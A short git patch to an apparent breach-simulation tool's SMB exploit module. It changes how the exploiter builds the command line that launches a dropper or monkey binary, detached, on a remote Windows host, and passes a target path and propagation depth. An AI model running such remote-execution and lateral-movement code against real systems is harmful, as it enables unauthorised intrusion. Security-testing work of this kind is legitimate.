From 68643ce343bb77a1925fa73a30597a0e2d255745 Mon Sep 17 00:00:00 2001 From: Itay Mizeretz Date: Thu, 19 Oct 2017 18:48:03 +0300 Subject: [PATCH] Add dropper target path on SMB exec --- chaos_monkey/exploit/smbexec.py | 8 ++++---- 1 file changed, 4 insertions(+), 4 deletions(-) diff --git a/chaos_monkey/exploit/smbexec.py b/chaos_monkey/exploit/smbexec.py index 0fc1f27fe..f5fa2b26b 100644 --- a/chaos_monkey/exploit/smbexec.py +++ b/chaos_monkey/exploit/smbexec.py @@ -86,11 +86,11 @@ class SmbExploiter(HostExploiter): # execute the remote dropper in case the path isn't final if remote_full_path.lower() != self._config.dropper_target_path.lower(): - cmdline = DROPPER_CMDLINE_DETACHED_WINDOWS % {'dropper_path': remote_full_path} + cmdline = DROPPER_CMDLINE_DETACHED_WINDOWS % {'dropper_path': remote_full_path} + \ + build_monkey_commandline(self.host, get_monkey_depth() - 1, self._config.dropper_target_path) else: - cmdline = MONKEY_CMDLINE_DETACHED_WINDOWS % {'monkey_path': remote_full_path} - - cmdline += build_monkey_commandline(self.host, get_monkey_depth() - 1) + cmdline = MONKEY_CMDLINE_DETACHED_WINDOWS % {'monkey_path': remote_full_path} + \ + build_monkey_commandline(self.host, get_monkey_depth() - 1) for str_bind_format, port in SmbExploiter.KNOWN_PROTOCOLS.values(): rpctransport = transport.DCERPCTransportFactory(str_bind_format % (self.host.ip_addr,))